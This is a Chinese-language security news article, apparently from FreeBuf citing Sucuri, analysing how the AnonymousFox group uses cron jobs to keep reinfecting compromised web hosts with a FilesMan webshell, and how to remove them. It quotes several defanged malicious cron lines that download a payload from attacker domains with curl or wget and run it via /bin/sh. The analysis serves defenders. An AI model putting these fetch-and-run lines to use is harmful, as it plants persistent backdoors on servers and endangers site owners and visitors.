黑客组织AnonymousFox 在新攻击中使用定时任务
2022-4-6 14:0:9 Author: www.freebuf.com(查看原文) 阅读量:25 收藏

freeBuf

主站

分类

漏洞 工具 极客 Web安全 系统安全 网络安全 无线安全 设备/客户端安全 数据安全 安全管理 企业安全 工控安全

特色

头条 人物志 活动 视频 观点 招聘 报告 资讯 区块链安全 标准与合规 容器安全 公开课

官方公众号企业安全新浪微博

FreeBuf.COM网络安全行业门户,每日发布专业的安全资讯、技术剖析。

FreeBuf+小程序

FreeBuf+小程序

最近,安全研究人员发现 AnonymousFox 在攻击中使用新的定时任务。本文将会介绍其中一个恶意定时任务,讲解其功能以及如何进行识别与删除。

什么是定时任务?

cron 是 Linux 环境的定时任务,很多服务器都是运行在 Linux 上的,管理人员经常使用定时任务执行的软件更新与执行备份等任务。

image.png-28.6kBcPanel 界面

攻击者也可以滥用定时任务从第三方服务器下载恶意样本。

感染

近年来,AnonymousFox 使用了很多种方法来进行持久化感染,避免被简单清除。例如,其恶意进程会不断重新感染,直到被终止。

image.png-82.7kB进程信息

再例如,通过 .htaccess禁止执行除了恶意脚本外的 PHP 脚本。

image.png-56.6kB禁止执行

攻击者会将数千个恶意文件写入失陷主机中,这不仅会干扰网站的正常运行(比如拦截用户访问控制面板),还会使清除这些恶意脚本变得非常困难。

恶意的定时任务在后台秘密执行,与恶意的 PHP 脚本配合着感染整个主机,脚本会不断重新感染受害者的定时任务。例如:

image.png-280.5kB部分代码

这种方法与近年来的挖矿恶意软件其实没什么区别。

定时任务分析

以 */10 * * * * curl -so gojj hxxp://golang666[.]xyz/css[.]index && /bin/sh gojj /home/[REDACTED]/public_html/[REDACTED] && rm -f gojj为例,使用 curl 下载恶意样本(AnonymousFox Webshell):

image.png-1089.4kB部分代码

写入 ./css/index.php文件中。

处理后是一个经典的 FilesMan Webshell:

image.png-412.3kB部分代码

不删除定时任务的情况下,主机会反复重新感染。删除恶意脚本前,一定要首先清除定时任务。

攻击者会非常频繁地更换 Payload 部署的地址,每次研究人员跟进调查的时候往往都已经被删除了。发现的部分定时任务:

*/15 * * * * wget -q -O xxxd hxxp://hello[.]ok2345678[.]xyz/xxxd && chmod 0755 xxxd && /bin/sh xxxd /home/[REDACTED]/public_html 24 && rm -f xxxd*/10 * * * * curl -so gojj hxxp://golang666[.]xyz/css[.]index && /bin/sh gojj /home/[REDACTED]/public_html/[REDACTED] && rm -f gojj* * * * * wget -q -O xxxd5 hxxp://tasks[.]ptfish[.]top/xxxd5 && chmod 0755 xxxd5 && /bin/sh xxxd5 /home/[REDACTED]/public_html && rm -f xxxd5*/22 * * * * wget hxxp://hello[.]turnedpro[.]xyz/xxxd && chmod 0755 xxxd && /bin/sh xxxd /home4/[REDACTED]/[REDACTED] c233 && rm -f xxxd* * * * * wget -q -O xxxd hxxp://hello[.]hahaha666[.]xyz/xxxd && chmod 0755 xxxd && /bin/sh xxxd /home/[REDACTED]/public_html 24 && rm -f xxxd

这些定时任务的目的都是相同的,重新感染主机阻碍恶意软件清除过程。

总结

AnonymousFox 是非常常见的恶意软件,其攻击具有侵略性和持续性,必须认真清理才能防止其卷土重来。

参考来源

Sucuri


文章来源: https://www.freebuf.com/articles/network/327494.html
如有侵权请联系:admin#unsafe.sh